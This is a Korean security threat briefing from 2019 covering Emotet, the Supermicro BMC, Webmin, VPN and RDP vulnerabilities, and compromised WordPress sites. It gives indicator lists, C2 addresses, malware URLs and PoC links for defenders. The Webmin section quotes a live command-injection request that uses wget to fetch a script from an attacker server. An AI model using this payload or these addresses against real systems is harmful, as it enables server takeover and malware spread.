해외 보안 트렌드

요약

- 8월 22일 C2의 활동 재개 움직임 후, 2019.09.16일 본격적인 스팸 공격 시작 (약 1달간 공격에 필요한 인프라를 구축한 것으로 추정)

- Emotet 시그니처가 포함된 악성 메일이 독일, 영국, 폴란드, 이탈리아, 미국의 개인/사업자/공공 기관을 대상으로 전파되고 있는 것이 포착 됨.

- 공격 대상 : 보안회사 Cofense Labs은 약 66,000의 이메일 주소, 30,000개의 도메인을 타겟으로 공격 중이라고 밝힘.

                 (해킹된 3,362 개의 이메일을 공격에 사용)

- 공격 양상 : 피싱 이메일 → Emotet 감염(뱅킹 트로잔 및 악성코드 다운로더)  → Trickbot 다운로드

                  *Trickbot에 감염 되었으나 감염 사실이 탐지 되지 않았다면, 추후 Ryuk 랜섬웨어에 감염될 소지가 있음)

- SpamHaus Project(스팸 관련 악성행위를 모니터링하는 단체)는 2019.09.16 Emotet의 활동이 다시 재개 되었다고 선언.

- Emotet 특징

  (1) 샘플 스팸 이메일  ※ 다수의 스팸이메일이 회신/답신의 형태로 이루어, 악성 매크로가 포함된 첨부파일을 확인하도록 유도함.

  (2) Microsoft의 매크로 사용 금지 기능을 우회

     : 가짜 라이센스 사용을 연장 메시지를 만들어 사용자가 매크로를 실행하도록 유도

 - 감염 샘플 트래픽  (hxxps://www.malware-traffic-analysis.net/2019/09/16/index.html)

 - 공격에 사용된 감염 웹사이트

customernoble.com - a cleaning company

taxolabs.com

www.mutlukadinlarakademisi.com - Turkish women's blog

www.holyurbanhotel.com

keikomimura.com

charosjewellery.co.uk

think1.com

broadpeakdefense.com

lecairtravels.com

www.biyunhui.com

nautcoins.com

- Emotet 관련 IoC

hxxps://pastebinp.ml/nUxnxSg4

hxxps://pastebinp.ml/cxqAPKx8

hxxps://pastebinp.ml/ZcULst7R

hxxps://pastebinp.ml/4QE6r8VX

hxxps://cofenselabs.com/emotet-updated-client-with-new-c2-list/

탐지룰 존재유무

- IBM : HTTP_Emotet_Trojan_CnC

- AhnLab-V3 : Trojan/Win32.Emotet.R248033

- FireEye : Generic.mg.9f31cd80fd32a04e 

- McAfee : Emotet-FKU!9F31CD80FD32

- Symantec : Trojan.Emotet

- TrendMicro : TSPY_EMOTET.THABOCAH

참고자료

출처 : https://www.bleepingcomputer.com/news/security/emotet-revived-with-large-spam-campaigns-around-the-world/#.XYAXocyXdhQ.twitter

https://twitter.com/spamhaus/status/1173512556960452608?s=20

https://twitter.com/CofenseLabs/status/1173506983997186053

https://twitter.com/Cryptolaemus1/status/1173849621220724736

https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/

요약

*BMC(Baseboard Management Controller) : IPMI(IntelligentPlatformManagementInterface) 유틸리티의 핵심 하드웨어 칩으로, 관리자들이 서버와 데스크톱에 대한 원격으로 긴급 모니터링하는데 활용.

- BMC의 기능 

① 호스트 시스템의 머더보드에 직접 접근할 수 있으며, 원격 리부팅, 원격 OS 설치, 원격 로그 분석 등의 기능을 제공

② 가상 미디어를 마운트 하여 디스크 이미지를 가상 USBCD-ROM또는 플로피 드라이브로 원격 서버에 연결 가능

- 취약점 : ""USBAnywhere""라고 불리는 이 공격은 BMC컨트롤러의 펌웨어에서 새로 발견된 여러 취약성을 이용하여 무단 원격 공격자가 Supermicro서버에 연결하고 가상으로 악성 USB장치를 마운트 할 수 있음.

원격으로 디스크 이미지에 접근할 경우 아래와 같은 취약성이 발생.

① 가상 미디어가 일반 텍스트 인증 허용

② 가상 미디어는 대부분의 트래픽을 암호화되지 않은 채 전송.

③ 암호화해 전송을 하더라도 약한 암호화 알고리즘을 사용. 

④ 인증 우회를 허용 함 (X10및 X11플랫폼만 해당)

- 영향성 : 

실제 사용자의 인증 패킷을 캡처링 하거나, 기본 자격 증명을 사용 또는 자격 증명 없이, 공격자는 서버에 쉽게 접근할 수 있게 됨.

접근 성공 시, 공격자는 마치 실제 USB 포트에 접근이 가능 환경에서의 행할 수 있는 모든 공격 가능

Ex) 새로운 운영체제 이미지 실행, 키보드와 마우스 사용이 가능해 서버 변환, 악성 코드 삽입, 장비 전체를 무력화 할 수 있음.

접근의 용이성과 간단한 공격 방법으로 뛰어난 기술이 없이도 공격이 가능. 

- 취약버전 : Supermicro x9, x10, x11플랫폼을 사용하는 시스템 

               ※ 자세한 상세버전은 아래 경로 참고 

               hxxps://www.supermicro.com/support/security_Intel-SA.cfm

- 조치 방안 : 최신패치 적용 (hxxps://www.supermicro.com/support/resources/bios_ipmi.php?vendor=1)

                 패치 불가시 TCP 623포트 연결 차단으로 임시조치. 

참고자료

출처 : https://eclypsium.com/2019/09/03/usbanywhere-bmc-vulnerability-opens-servers-to-remote-attack/

        https://threatpost.com/usbanywhere-bugs-supermicro-remote-attack/147899/

        https://thehackernews.com/2019/09/hacking-bmc-server.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Cyber+Security+Blog%29

        https://www.supermicro.com/support/security_Intel-SA.cfm?pg=X11#tab

요약

- GreyNoise는 8월30일 전후 전체 미라이 감염 중 7%에 달하는 IP들이 NETsurveillance Acitve X 플러그인을 사용하는

        DVR/IP 카메라를 대상으로 한 대 단위 스캔 포착.

- 해당 IP는 TCP 34567 포트를 스캔하며, 8월28일 변종 미라이 컨트롤러에 추가된 기능과 연관이 있을 것으로 추정

- 보안 전문가 Masafumi Negishi 는 이를 Moobot 스캔이라 판정

* 34567 포트 : 외부에서 공유기에 접속 시 사용하는 포트포워딩 디폴트 포드로도 사용되고 있음.

※ Moobot 로더에 Moobot  C2 서버 : 80.82.65.213 (네덜란드)

   https://twitter.com/bad_packets/status/1167336978041303040

<Sans 포트 공격 트랜드 > 

 https://isc.sans.edu/port.html?port=34567

<360 NetLab> 

 https://scan.netlab.360.com/#/dashboard?tsbeg=1564848000000&tsend=1567440000000&dstport=34567&toplistname=srcip&topn=10

<GreyNoise Anomaly 탐지 - 34567 포트 스캔> 

8/29 월 평균 기준 대비 518% 증가                                                  

8/30 월 평균 기준 대비 793% 증가                                                  

9/1  월 평균 기준 대비 776% 증가

참고자료

출처 : https://twitter.com/GreyNoiseIO/status/1167582968241696772

  https://twitter.com/MasafumiNegishi/status/1167074841586913280

  https://twitter.com/bad_packets/status/1167336978041303040

  https://isc.sans.edu/port.html?port=34567

  https://scan.netlab.360.com/#/dashboard?tsbeg=1564848000000&tsend=1567440000000&dstport=34567&toplistname=srcip&topn=10

  https://twitter.com/bad_packets/status/1167336978041303040

요약

※ 2019년 7월 31일 KISA 업데이트 보안 권고 발표 

- 2019년 블랙햇에서 발표된 Pulse Secure VPN(CVE-2019-11510)과 Fortinet 사의 FortiGate VPN(CVE-2018-13379) 

        취약점을 이용한 공격이 이루어지고 있음.

* 취약점 관련 발표 자료 제목 : "Infiltrating Corporate Intranet Like NSA: Pre-auth RCE on Leading SSL VPNs"

(PDF로 보기: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf)

- 공격 패턴 : 취약 시스템을 스캔 → Pulse Secure VPN의 시스템 패스워드와, FortiGate VPN의 VPN 세션 파일을 탈취 

                           → 성공 시 공격자는 장비의 인증을 통과하거나 실제 VPN 세션으로 위장할 수 있음.

- 취약점 스캔 IP : 2.137.127.2, 81.40.150.167, 185.25.51.58 

- 공식 대응법 : 취약 버전 업데이트 

(참고 : https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35101)

관련 CVE정보

- CVE-2019-11510

- CVSS Base Score : 8.8

- 현재 공격에 사용되고 있는 PoC : https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/

- PoC : https://github.com/imjdl/CVE-2019-11510-poc/blob/master/poc.py

https://github.com/projectzeroindia/CVE-2019-11510?fbclid=IwAR1ItHo1CPawodILvooxs_u3U9tc8WqiOYr1DFFrPRSvWGaOpAYxuGg6b4s

https://www.tenable.com/blog/cve-2019-11510-proof-of-concept-available-for-arbitrary-file-disclosure-in-pulse-connect-secure

참고자료

출처 : https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/

   https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/SA44101/s

   https://www.zdnet.com/article/hackers-mount-attacks-on-webmin-servers-pulse-secure-and-fortinet-vpns/

요약

*Webmin : 원격 유닉스 기반 시스템 관리 웹 어플리케이션

- 8/20 일경 Webmin 주요 원격코드 취약점/백도어 취약점(CVE-2019-15107) 가 공개 된 다음날부터(8/21) 공격 시작

- 취약점 : SourceForge에서 제공했던 Webmin 패지키에 악성코드가 삽입되어 있어, 

                   취약 버전을 해당 사이트에서 다운받을 시 Webmin이 설치 된 모든 Linux, FreeBSD, OpenBSD 서버에 접근 가능.

- 영향받는 제품 : SourceForge에서 다운로드한 

Webmin 1.882 ~ 1.921 버전

*Webmin 1.890 버전 : 초기 설정 유지 시 즉각적인 업데이트 필요

- 선행 조건 : 1.890 이 외 버전의 경우 만료된 비밀번호 바꾸기가 enable 되어 있는 경우에만 취약

- 취약점 스캔 IP : 89.248.171.57

- 공격 IP : hxxps://pastebin.com/Piqerntf  문서 참고

   페이로드 : 

   POST /password_change.cgi HTTP/1.1  "user=roots&pam=&expired=2|wget http://128.199.251.119/webmin.php;etc&old=foo&new2=bar"

   목표 포트 : 10000

         공격 IP 

107.152.33.18

91.33.88.112

144.140.214.82

190.94.144.2

54.39.123.246

190.94.148.209

74.198.243.135

191.100.8.141

162.250.59.87

94.130.51.16

149.154.64.98

91.121.157.178

191.100.11.144

190.94.141.20

190.94.139.188

51.75.195.222

218.161.28.223

176.140.192.16

213.6.16.226

35.160.164.0

103.10.61.93

51.75.195.222

185.181.164.30  

40.78.3.140 

47.102.47.25

75.98.169.36

159.65.216.53

201.238.154.235

191.100.11.27

191.100.11.230

191.100.11.117

178.128.55.225

34.230.66.41

79.0.3.212

- 대표 공격 IP :  147.135.124.113 IoT Botnet CloudBot Det (8/24이후 지속적으로 국내/해외 그룹사의 10000포트로 접근 시도)

(https://twitter.com/bad_packets/status/1165120433462493186?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1165120433462493186&ref_url=https%3A%2F%2Fwww.zdnet.com%2Farticle%2Fhackers-mount-attacks-on-webmin-servers-pulse-secure-and-fortinet-vpns%2F)

- 공식 대응법 : Webmin 1.930 버전으로 업데이트 

관련 CVE정보

- CVE-2019-15107

- CVSS Base Score : 9.8

- PoC : Webmin 비인가자 원격 코드 실행 

https://www.exploit-db.com/exploits/47230

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html

탐지룰 존재유무

- IBM : HTTP_Webmin_PasswordChange_Exec

- Symantec : Web Attack: Webmin Remote Code Execution CVE-2019-15107

참고자료

출처 : https://sensorstechforum.com/cve-2019-15107-webmin/

   https://www.zdnet.com/article/hackers-mount-attacks-on-webmin-servers-pulse-secure-and-fortinet-vpns/

Webmin 백도어 : https://www.zdnet.com/article/backdoor-found-in-webmin-a-popular-web-based-utility-for-managing-unix-servers/

요약

- 8월 정기 패치 중 원격 데스크톱 서비스 관련 총 7개 취약점 패치 발표

- 7가지의 RDP 관련 취약점을 통틀어 "Seven Monkeys/ DejaBlue"로 칭함

- 특징 : RDP 프로토콜 자체에 영향을 미치지 않으나, 구)Terminal Service였던 Remote Desktop Service내 취약점이 존재

- 영향성 : 해당 취약점들을 이용한 공격은 현재까지 없음.

CVE-2019-1181, CVE-2019-1182 : 대부분의 윈도우 버전 해당

CVE-2019-1222, CVE-2019-1226 : Windows 10, Windows Server Edition 해당

(1) CVE-2019-1181, CVE-2019-1182 - Wormable 모든 윈도우 버전 해당

- 취약점 : Remote Desktop Service(구, Terminal Service)에 취약점이 존재해, 특수하게 가공된 Request를 목표 RDP에 보낼 시 

             비인가 원격 공격자가 임의의 코드를 실행 할 수 있음

             공격자는 프로그램 설치/데이터 보기, 수정, 삭제/모든 사용자 권한을 가진 새로운 계정을 생성할 수 있음.

- 취약점 이용 공격 가능성 : 높음

- CVE Base Score : 9.8

- 영향 받는 제품 : Windows 10, Windows 7 (RDP 8.0, RDP 8.1이 설치된 경우), Windows 8.1, Windows RT 8.1, 

                        Windows Server 2008 R2(RDP 8.0, RDP 8.1이 설치된 경우), Windows Server 2012, 

                        Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, Windows Server version 1803, 

                        Windows Server version 1903 

- 대응방안 : 신속한 패치 필요. RDP 사용을 하지 않을 경우 Disable로 설정 

- 차선책 : 

1) Windows 7, Windows Server 2008, Windows Server 2008 R2 경우

   네트워크 레벨 인증(Network Level Authentication(NLA)) Enable로 설정

2) 방화벽에서 TCP 3389 포트 Block 설정

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1181

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1182

(2) CVE-2019-1222, CVE-2019-1226

- 취약점 : Remote Desktop Service(구, Terminal Service)에 취약점이 존재해, 특수하게 가공된 Request를 목표 RDP에 보낼 시 

             비인가 원격 공격자가 임의의 코드를 실행 할 수 있음

       공격자는 프로그램 설치/데이터 보기, 수정, 삭제/모든 사용자 권한을 가진 새로운 계정을 생성할 수 있음.

- 영향 받는 제품 : Windows 10, Windows Server 2019, Windows Server version 1803, Windows Server version 1903 

- 대응 방안 : 신속한 패치 필요

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1222

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1226

(3) 추가 RDP 취약점: 

- CVE-2019-1223 : DoS

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1223

- CVE-2019-1224, CVE-2019-1225 : 메모리의 콘텐츠 노출

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1224

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1225

관련 CVE정보

- CVE-2019-1181, CVE-2019-1182, CVE-2019-1222, CVE-2019-1226, CVE-2019-1223, CVE-2019-1224, CVE-2019-1225

영향성

     해당 제품 사용 그룹사는 신속한 패치 필요

참고자료

출처 : https://thehackernews.com/2019/08/windows-rdp-wormable-flaws.html 

   https://www.zdnet.com/article/microsoft-august-2019-patch-tuesday-fixes-93-security-bugs/

요약

- 악성코드 연구원 트위터 ID blackorbird 는 WordPress 를 이용한 다량의 공격 모의 정황을 포착하고 이를 Wpbot 그룹으로 칭함.

- 발견된 웹페이지(http[:]//formfactset.org:8082/static/backdoorGood.txt)에는 5만건의 넘는 WordPress 웹 사이트가 존재하며, 이 중 일부에서 리눅스 봇넷 백도어를 다운로드 됨을 확인.

- 관련 정보는 연구원의 GitHub 페이지 및 트위터 계정에서 확인 가능 

(1) Github : https://github.com/blackorbird/APT_REPORT/tree/master/data/wordpress

(2) Twitter : https://twitter.com/blackorbird/status/1158395875997057025

- 해킹으로 추측되는 WordPress URI 리스트 원문: hxxp://formfactset.org:8082/static/backdoorGood.txt 

- 확인된 악성코드 다운로드 URI

hxxp://mongol-kino.mn/wp-content/uploads/2019/07/IcYbJa

hxxps://indojayaprimergy.com/wp-content/plugins/apikey/3JQoFf

hxxps://free-food.000webhostapp.com/wp-content/uploads/2019/06/vULqz9

hxxps://tgm.tgmapartments.com/hack/f190Iw

hxxp://boutique.liberal.ca/wp-content/uploads/2019/06/8puk0P

hxxps://www.georgevaults.com/wp-content/uploads/2019/05/WOtgUS

hxxp://www.skoda-bohemiamotors.pl/wp-content/uploads/2019/05/bunIjd

- 봇넷 멀웨어 : 샘플은 Github 페이지에서 다운로드 가능

47d704b79364e2ab333e614c166d0b7d (https://www.virustotal.com/gui/file/0f4755f65c495d3711bf22271f85f1ee86da8b7a487e770f769af56e189be48c/detection)

db08d343049c733a97bccaf394db56a2 (https://www.virustotal.com/gui/file/a316d81976b82d3d6cee974ba4dd5333506d2c93a7f0b2e5cd8e1a75bb325a1b/relations)

- 감염경로

워드프레스 취약점을 악용한 공격으로 플러그인의 취약점을 이용한 공격으로 추정

일부 워드프레스 사용 피해자 컨택 결과, 잘 알려지지 않은 플러그인을 설치했던 것 이외에 특이사항을 발견하지 못함.

※ 감염 시, 해당 도메인(hxxp://formfactset.org)으로 정보를 전송하는 것으로 추정 (링크)

탐지룰 존재유무

- 네트웍 보안장비 탐지룰 : 현재 없음

- 백신 및 APT탐지 : FireEYE (o), AhnLab (x)

FireEYE : Trojan.Zyx.FEC3

TrendMicro : Trojan.Linux.ZYX.USELVEE19

Symantec : Trojan.Gen.2

참고자료

출처 : https://twitter.com/blackorbird/status/1158395875997057025

         https://github.com/blackorbird/APT_REPORT/tree/master/data/wordpress

요약

- Emotet 진화 : 

① 뱅킹 트로잔으로 시작하였으나, 봇넷으로 전파력 향상 및 새로운 기능 탑재 등 한층 업그레이드 됨  

    (크리덴셜 스틸링,네트워크 전염, 이메일을 통한 확산, 주소록 탈취 등 기능 추가)

② 새로운 전파 기술을 적용탐지 우회 능력 향상과 동시에 다양한 악성행위를 행하는 교두보 봇넷 역할에 집중하는 추세

- 전파방법 : 피싱이메일의 악성 링크, 첨부파일

    (최근 보고서들에 따르면 악성 페이로드를 포함하는 모든 스팸 중 60%가 emotet으로 나타남)

- 영향성 : 시스템이 emotet에 감염된 후, 추가적으로 다양한 악성코드를 시스템에 감염시킴

- C2와 통신 : 감염 IoT 장비를 Bot C2로 활용

  신규 감염 시스템 → Bot C2(감염 IoT 장비) → Tier 1 C2 (해킹된 웹 호스트) →  Tier 2 C2

      ① 새로 감염된 장비에는 40+개의 C2 주소가 포함된 페이로드 다운로드 (Bot C2, Tier 1 C2)

      ② emotet 감염된 IoT 장비에 UPnP 모듈이 활성화해 Bot C2로 활용되고, 프록시 역할을 하며 감염장비에서 Tier 1 C2로 커뮤니케이션 포워딩 함

      ③ 주로 해킹된 웹호스트인 Tier 1 C2는 Tier 2 C2 서버로 커뮤니케이션을 포워딩 함.

- Emotet 활동 재개 포착 : 브라질, 멕시코, 독일, 일본, 미국 

- 올해 6월 활동 이후 활동 재개 포착 : 비활성이던 Emotet 봇들이 새로운 바이너리를 제공하기 시작 

- 현재 공격은 펼치지 않음 : 공격 전 시스템 환경 구축에 시간이 필요해 즉각적인 공격이 이루어 지지 않은 것으로 보임

                                          (봇넷 새로 구축, AV 봇 제거, anti spam 제품을 우회 테스트 시간 필요, 공격 캠패인전 준비기간 필요 등)

- C2 :

104.131.11.150:8080

104.131.208.175:8080

104.236.151.95:7080

142.93.88.16:443

144.139.247.220:80

159.89.179.87:7080

162.144.119.216:8080

162.243.125.212:8080

170.150.11.245:8080

176.31.200.130:8080

177.242.214.30:80

187.163.180.243:22

195.242.117.231:8080

216.98.148.156:8080

217.13.106.160:7080

31.12.67.62:7080

45.123.3.54:443

45.32.158.232:7080

46.101.142.115:8080

46.105.131.69:443

64.13.225.150:8080

69.45.19.145:8080

70.32.84.74:8080

75.127.14.170:8080

91.83.93.103:7080                    

탐지룰 존재유무

- IBM : HTTP_Emotet_Trojan_CnC

- AhnLab-V3 : Trojan/Win32.Emotet.R248033

- FireEye : Generic.mg.9f31cd80fd32a04e 

- McAfee : Emotet-FKU!9F31CD80FD32

- Symantec : Trojan.Emotet

- TrendMicro : TSPY_EMOTET.THABOCAH

참고자료

출처 : https://www.bleepingcomputer.com/news/security/emotet-botnet-is-back-servers-active-across-the-world/

   https://www.centurylink.com/business/security/black-lotus-labs.html?rid=blacklotuslabs